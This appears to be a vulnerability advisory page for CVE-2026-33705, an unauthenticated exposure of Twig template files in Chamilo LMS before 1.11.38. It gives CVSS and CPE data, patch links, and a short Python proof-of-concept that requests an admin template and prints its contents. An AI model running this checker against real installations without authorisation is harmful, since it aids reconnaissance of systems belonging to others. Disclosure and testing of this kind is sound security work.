Security Vulnerability Report
CVE-2026-33705 CVSS 5.3 MEDIUM

Published: 2026-04-10 19:16:24
Last Modified: 2026-04-16 18:29:47

Description

Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* - VULNERABLE
Chamilo LMS < 1.11.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def check_vulnerability(base_url):
    # Example target file path: a Twig template under the unprotected directory
    target_path = "/main/template/default/admin/layout.tpl"
    full_url = base_url + target_path
    try:
        # Send HTTP GET request without authentication
        response = requests.get(full_url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Found at: {full_url}")
            # Check if response contains typical template syntax
            if "{%" in response.text or "{{" in response.text:
                print("[+] Template syntax detected in response.")
                print("[+] Content snippet:")
                print(response.text[:200])
            return True
        else:
            print(f"[-] Status Code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    # Any non-200 status or request failure is treated as not vulnerable
    return False


if __name__ == "__main__":
    target = "http://example.com"  # Replace with actual target
    check_vulnerability(target)
```

References

Weakness: CWE-538 (Insertion of Sensitive Information into Externally-Accessible File or Directory)

Patch: https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff

Vendor Advisory: https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57